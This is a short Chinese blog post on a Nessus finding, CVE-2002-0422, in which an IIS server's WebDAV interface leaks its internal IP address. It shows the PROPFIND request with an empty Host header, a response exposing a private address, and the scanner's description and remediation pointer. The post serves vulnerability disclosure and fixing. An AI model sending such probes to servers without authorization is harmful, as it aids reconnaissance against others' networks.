Web Server PROPFIND Method internal IP Discosure

时间:2024-06-17 08:34:50

Title:Web Server PROPFIND Method internal IP Discosure  --2012-11-09 09:47

Nessus扫描出来一个安全缺陷,Web Server PROPFIND Method internal IP Discosure,CVE-2002-0422

用HTTP的PROPFIND方法,HOST为空,提交,会暴露真实WEB服务器内网的IP地址。

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0422

请求:

--------------------------------------------------------------

PROPFIND / HTTP/1.1
Host: 
Content-Length: 0

--------------------------------------------------------------

回执:

--------------------------------------------------------------

HTTP/1.1 207 Multi-Status
Date: Fri, 09 Nov 2012 01:15:05 GMT
Server: *****************
X-Powered-By: ASP.NET
Content-Type: text/xml
Transfer-Encoding: chunked

2fb
<?xml version="1.0"?><a:multistatus xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/" xmlns:c="xml:" xmlns:a="DAV:"><a:response><a:href>http://192.168.2.3/images/</a:href><a:propstat><a:status>HTTP/1.1 200 OK</a:status><a:prop><a:getcontentlength b:dt="int">0</a:getcontentlength><a:creationdate b:dt="dateTime.tz">2009-09-29T07:13:21.356Z</a:creationdate><a:displayname>images</a:displayname><a:getetag>"2ddfaf54d440ca1:1d28"</a:getetag><a:getlastmodified b:dt="dateTime.rfc1123">Tue, 29 Sep 2009 07:13:23 GMT</a:getlastmodified><a:resourcetype><a:collection/></a:resourcetype><a:supportedlock/><a:ishidden b:dt="boolean">0</a:ishidden><a:iscollection b:dt="boolean">1</a:iscollection><a:getcontenttype/></a:prop></a:propstat></a:response></a:multistatus>
0

--------------------------------------------------------------

如图:

Web Server PROPFIND Method internal IP Discosure

Synopsis(简介): This web server leaks a private IP address through its WebDAV interface.



Description
(描述):The remote installation of IIS leaks a private IP address through the WebDAV interface. This may expose internal IP addresses that are usually hidden or masked behind a Network Address Translation (NAT) Firewall or proxy server. 

This is typical of IIS installations that are not configured properly.



Solution
(解决方法):Consult Microsoft's KB article for steps to resolve the issue.